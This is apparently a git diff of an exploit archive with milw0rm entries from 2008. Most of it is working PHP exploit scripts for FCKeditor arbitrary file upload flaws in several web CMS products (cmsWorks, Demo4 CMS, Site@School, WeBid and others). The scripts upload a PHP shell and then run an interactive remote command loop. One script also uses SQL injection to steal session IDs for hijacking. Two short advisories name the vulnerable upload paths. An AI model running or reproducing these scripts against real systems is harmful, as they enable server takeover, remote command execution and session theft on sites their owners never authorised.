array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"), + + with a default configuration of this script, an attacker might be able to upload arbitrary + files containing malicious PHP code due to multiple file extensions isn't properly checked +*/ +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 
80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} +function upload() +{ + global $host, $path; + + $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php"; + $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv"); + + foreach ($file_ext as $ext) + { + print "\n[-] Trying to upload with .{$ext} extension..."; + + $data = "--12345\r\n"; + $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n"; + $data .= "Content-Type: application/octet-stream\r\n\r\n"; + $data .= "\r\n"; + $data .= "--12345--\r\n"; + + $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Content-Length: ".strlen($data)."\r\n"; + $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $packet .= $data; + + preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html); + + if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]}: {$html[2]})\n"); + + $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $html = http_send($host, $packet); + + if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; + + sleep(1); + } + + return false; +} +print "\n+--------------------------------------------------------------------+"; +print "\n| cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit |"; +print "\n+--------------------------------------------------------------------+\n"; +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] host path\n"; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /achievo/\n"; + die(); +} +$host = $argv[1]; +$path = $argv[2]; +if (!($ext = upload())) die("\n\n[-] Exploit failed...\n"); +else print "\n[-] Shell uploaded...starting it!\n"; +define(STDIN, fopen("php://stdin", "r")); +while(1) +{ + print "\nStack-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $html = http_send($host, $packet); + if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $html); + print "\n{$shell[1]}"; + } + else break; +} +?> + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5923.pl b/platforms/php/webapps/5923.pl index a923ab17d..0469d592b 100755 --- a/platforms/php/webapps/5923.pl +++ b/platforms/php/webapps/5923.pl 
@@ -1,136 +1,136 @@ - 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) - 63. SendResults( '202' ) ; - 64. - 65. $sErrorNumber = '0' ; - 66. $sFileUrl = '' ; - 67. - 68. // Initializes the counter used to rename the file, if another one with the same name already exists. - 69. $iCounter = 0 ; - 70. - 71. // The the target directory. - 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) - 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; - 74. else - 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; - 76. $sServerDir = $Config["UserFilesPath"] ; - 77. - 78. while ( true ) - 79. { - 80. // Compose the file path. - 81. $sFilePath = $sServerDir . $sFileName ; - 82. - 83. // If a file with that name already exists. - 84. if ( is_file( $sFilePath ) ) - 85. { - 86. $iCounter++ ; - 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; - 88. $sErrorNumber = '201' ; - 89. } - 90. else - 91. { - 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; - 93. - 94. if ( is_file( $sFilePath ) ) - 95. { - 96. $oldumask = umask(0) ; - 97. chmod( $sFilePath, 0777 ) ; - 98. umask( $oldumask ) ; - 99. } - 100. - 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; - 102. - 103. 
break ; - -*/ -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} -print "\n+------------------------------------------------------------+"; -print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |"; -print "\n+------------------------------------------------------------+\n"; -if ($argc < 2) -{ - print "\nUsage......: php $argv[0] host path"; - print "\nExample....: php $argv[0] localhost /booking_calendar/\n"; - die(); -} -$host = $argv[1]; -$path = $argv[2]; -$data = "--12345\r\n"; -$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; -$data .= "Content-Type: application/octet-stream\r\n\r\n"; -$data .= "\n"; -$data .= "--12345--\r\n"; -$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($data)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $data; -preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); -else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; -define(STDIN, fopen("php://stdin", "r")); -while(1) -{ - print "\nstack-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} -?> - -# milw0rm.com [2008-06-23] + 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) + 63. SendResults( '202' ) ; + 64. + 65. $sErrorNumber = '0' ; + 66. $sFileUrl = '' ; + 67. + 68. // Initializes the counter used to rename the file, if another one with the same name already exists. + 69. $iCounter = 0 ; + 70. + 71. // The the target directory. + 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) + 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; + 74. else + 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; + 76. $sServerDir = $Config["UserFilesPath"] ; + 77. + 78. while ( true ) + 79. { + 80. // Compose the file path. + 81. $sFilePath = $sServerDir . $sFileName ; + 82. + 83. // If a file with that name already exists. + 84. if ( is_file( $sFilePath ) ) + 85. { + 86. $iCounter++ ; + 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; + 88. $sErrorNumber = '201' ; + 89. } + 90. else + 91. { + 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; + 93. + 94. if ( is_file( $sFilePath ) ) + 95. { + 96. $oldumask = umask(0) ; + 97. chmod( $sFilePath, 0777 ) ; + 98. umask( $oldumask ) ; + 99. } + 100. + 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; + 102. + 103. 
break ; + +*/ +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} +print "\n+------------------------------------------------------------+"; +print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |"; +print "\n+------------------------------------------------------------+\n"; +if ($argc < 2) +{ + print "\nUsage......: php $argv[0] host path"; + print "\nExample....: php $argv[0] localhost /booking_calendar/\n"; + die(); +} +$host = $argv[1]; +$path = $argv[2]; +$data = "--12345\r\n"; +$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; +$data .= "Content-Type: application/octet-stream\r\n\r\n"; +$data .= "\n"; +$data .= "--12345--\r\n"; +$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; +preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; +define(STDIN, fopen("php://stdin", "r")); +while(1) +{ + print "\nstack-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} +?> + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5945.txt b/platforms/php/webapps/5945.txt index d143ea00b..842e0bdfd 100755 --- a/platforms/php/webapps/5945.txt +++ b/platforms/php/webapps/5945.txt 
@@ -1,117 +1,117 @@ -\r\n"; -$payload .= "--o0oOo0o--\r\n"; - -$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($payload)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $payload; - -preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html); -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); - -while(1) -{ - print "\nseagull-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} - -?> - -# milw0rm.com [2008-06-26] +\r\n"; +$payload .= "--o0oOo0o--\r\n"; + +$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($payload)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $payload; + +preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html); +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); + +while(1) +{ + print "\nseagull-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} + +?> + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/6005.php b/platforms/php/webapps/6005.php index 45f24b2c7..424ab0782 100755 --- a/platforms/php/webapps/6005.php +++ b/platforms/php/webapps/6005.php 
@@ -1,194 +1,194 @@ -\r\n"; - $payload .= "--o0oOo0o--\r\n"; - - $packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Cookie: PHPSESSID={$sid}\r\n"; - $packet .= "Content-Length: ".strlen($payload)."\r\n"; - $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $packet .= $payload; - - if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n"); - - $packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $html = http_send($host, $packet); - - if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; - - sleep(1); - } - - return false; -} - -function get_sid() -{ - global $host, $path, $prefix; - - // thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend! - $sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" . 
- "FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23"; - - $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - $pieces = explode(chr(0xFF), http_send($host, $packet)); - return $pieces[1]; -} - -function check_target() -{ - global $host, $path, $prefix; - - print "\n[-] Checking {$host}..."; - - $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n"; - else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n"); - - $prefix = $match[1]; -} - -print "\n+-----------------------------------------------------------------------+"; -print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |"; -print "\n+-----------------------------------------------------------------------+\n"; - -if ($argc < 3) -{ - print "\nUsage...: php $argv[0] host path \n"; - print "\nhost....: target server (ip/hostname)"; - print "\npath....: path to sas directory\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -check_target(); -$sid = get_sid(); - -if (empty($sid)) die("\n[-] Session id not found! 
Try later...\n"); -else print "\n[-] Hijacking with sid {$sid}\n"; - -if (!($ext = upload())) die("\n[-] Exploit failed...\n"); -else print "\n[-] Shell uploaded...starting it!\n"; - -while(1) -{ - print "\nsas-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} - -?> - -# milw0rm.com [2008-07-04] +\r\n"; + $payload .= "--o0oOo0o--\r\n"; + + $packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Cookie: PHPSESSID={$sid}\r\n"; + $packet .= "Content-Length: ".strlen($payload)."\r\n"; + $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $packet .= $payload; + + if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n"); + + $packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $html = http_send($host, $packet); + + if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; + + sleep(1); + } + + return false; +} + +function get_sid() +{ + global $host, $path, $prefix; + + // thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend! + $sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" . 
+ "FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23"; + + $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + $pieces = explode(chr(0xFF), http_send($host, $packet)); + return $pieces[1]; +} + +function check_target() +{ + global $host, $path, $prefix; + + print "\n[-] Checking {$host}..."; + + $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n"; + else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n"); + + $prefix = $match[1]; +} + +print "\n+-----------------------------------------------------------------------+"; +print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |"; +print "\n+-----------------------------------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage...: php $argv[0] host path \n"; + print "\nhost....: target server (ip/hostname)"; + print "\npath....: path to sas directory\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +check_target(); +$sid = get_sid(); + +if (empty($sid)) die("\n[-] Session id not found! 
Try later...\n"); +else print "\n[-] Hijacking with sid {$sid}\n"; + +if (!($ext = upload())) die("\n[-] Exploit failed...\n"); +else print "\n[-] Shell uploaded...starting it!\n"; + +while(1) +{ + print "\nsas-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} + +?> + +# milw0rm.com [2008-07-04] diff --git a/platforms/php/webapps/6344.php b/platforms/php/webapps/6344.php index 28f96ad57..be299924a 100755 --- a/platforms/php/webapps/6344.php +++ b/platforms/php/webapps/6344.php 
@@ -1,110 +1,110 @@
- array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
-
- with a default configuration of this script, an attacker might be able to upload arbitrary
- files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
- print "\n[-] No response from {$host}:80 Trying again...";
- $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-function upload()
-{
- global $host, $path;
-
- $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
- $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
-
- foreach ($file_ext as $ext)
- {
- print "\n[-] Trying to upload with .{$ext} extension...";
-
- $data = "--12345\r\n";
- $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
- $data .= "Content-Type: application/octet-stream\r\n\r\n";
- $data .= "\r\n";
- $data .= "--12345--\r\n";
-
- $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
- $packet .= "Host: {$host}\r\n";
- $packet .= "Content-Length: ".strlen($data)."\r\n";
- $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
- $packet .= "Connection: close\r\n\r\n";
- $packet .= $data;
-
- preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-
- if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-
- $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
- $packet .= "Host: {$host}\r\n";
- $packet .= "Connection: close\r\n\r\n";
- $html = http_send($host, $packet);
-
- if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-
- sleep(1);
- }
-
- return false;
-}
-print "\n+--------------------------------------------------------------------+";
-print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
-print "\n+--------------------------------------------------------------------+\n";
-if ($argc < 3)
-{
- print "\nUsage......: php $argv[0] host path\n";
- print "\nExample....: php $argv[0] localhost /";
- print "\nExample....: php $argv[0] localhost /WeBid/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nStack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
- $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
- $packet.= "Host: {$host}\r\n";
- $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
- $packet.= "Connection: close\r\n\r\n";
- $html = http_send($host, $packet);
- if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
- $shell = explode("_code_", $html);
- print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-09-01]
+ array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+
+ with a default configuration of this script, an attacker might be able to upload arbitrary
+ files containing malicious PHP code due to multiple file extensions isn't properly checked
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+ print "\n[-] No response from {$host}:80 Trying again...";
+ $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+function upload()
+{
+ global $host, $path;
+
+ $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
+ $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+
+ foreach ($file_ext as $ext)
+ {
+ print "\n[-] Trying to upload with .{$ext} extension...";
+
+ $data = "--12345\r\n";
+ $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+ $data .= "Content-Type: application/octet-stream\r\n\r\n";
+ $data .= "\r\n";
+ $data .= "--12345--\r\n";
+
+ $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+ $packet .= "Host: {$host}\r\n";
+ $packet .= "Content-Length: ".strlen($data)."\r\n";
+ $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+ $packet .= "Connection: close\r\n\r\n";
+ $packet .= $data;
+
+ preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+
+ if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+
+ $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+ $packet .= "Host: {$host}\r\n";
+ $packet .= "Connection: close\r\n\r\n";
+ $html = http_send($host, $packet);
+
+ if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+
+ sleep(1);
+ }
+
+ return false;
+}
+print "\n+--------------------------------------------------------------------+";
+print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
+print "\n+--------------------------------------------------------------------+\n";
+if ($argc < 3)
+{
+ print "\nUsage......: php $argv[0] host path\n";
+ print "\nExample....: php $argv[0] localhost /";
+ print "\nExample....: php $argv[0] localhost /WeBid/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+else print "\n[-] Shell uploaded...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nStack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+ $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+ $packet.= "Host: {$host}\r\n";
+ $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+ $packet.= "Connection: close\r\n\r\n";
+ $html = http_send($host, $packet);
+ if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+ $shell = explode("_code_", $html);
+ print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6360.txt b/platforms/php/webapps/6360.txt
index 6459a2d07..0b0d362f7 100755
--- a/platforms/php/webapps/6360.txt
+++ b/platforms/php/webapps/6360.txt
@@ -1,53 +1,53 @@
-########################## www.BugReport.ir #######################################
-#
-# AmnPardaz Security Research Team
-#
-# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
-# Vendor: www.translucidonline.com
-# Vulnerable Version: 1.75 (prior versions also may be affected)
-# Exploitation: Remote with browser
-# Exploit: Available
-# Impact: Medium
-# Fix: N/A
-# Original Advisory: http://www.bugreport.ir/index_51.htm
-###################################################################################
-
-####################
-- Description:
-####################
-
-transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
-growing list of ready-made, professional layouts.
-
-####################
-- Vulnerability:
-####################
-
-+--> Fckeditor Arbitrary File Upload
-
-The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
-
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
-
-
-####################
-- Exploit:
-####################
-
-http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- Credit :
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-09-03]
+########################## www.BugReport.ir #######################################
+#
+# AmnPardaz Security Research Team
+#
+# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
+# Vendor: www.translucidonline.com
+# Vulnerable Version: 1.75 (prior versions also may be affected)
+# Exploitation: Remote with browser
+# Exploit: Available
+# Impact: Medium
+# Fix: N/A
+# Original Advisory: http://www.bugreport.ir/index_51.htm
+###################################################################################
+
+####################
+- Description:
+####################
+
+transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
+growing list of ready-made, professional layouts.
+
+####################
+- Vulnerability:
+####################
+
++--> Fckeditor Arbitrary File Upload
+
+The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
+
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
+
+
+####################
+- Exploit:
+####################
+
+http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- Credit :
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-09-03]
diff --git a/platforms/php/webapps/6410.txt b/platforms/php/webapps/6410.txt
index c14031dcf..e9ff4d002 100755
--- a/platforms/php/webapps/6410.txt
+++ b/platforms/php/webapps/6410.txt 
@@ -1,46 +1,46 @@
-########################################################################
-#
-# S4rK3VT Hacking TEAM
-#
-# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
-# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
-# discover by : Ciph3r
-# We Are : Ciph3r & Rake
-# Ciph3r_blackhat@yahoo.com
-# Impact: Medium
-# Fix: N/A
-# Expl0ters Security TEAM ==>> www.Expl0iters.ir
-########################################################################
-
-####################
-- Vulnerability:
-####################
-
-+--> Fckeditor Arbitrary File Upload
-
-The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
-
-[path]/fck/editor/filemanager/upload/php/upload.php script.
-
-
-####################
-- Exploit:
-####################
-
-http://example.com/[path]/fck/editor/filemanager/upload/test.html
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- GreTzZ :
-####################
-
-Iranian Hacker & Kurdish Security TEAM & My Mother
-
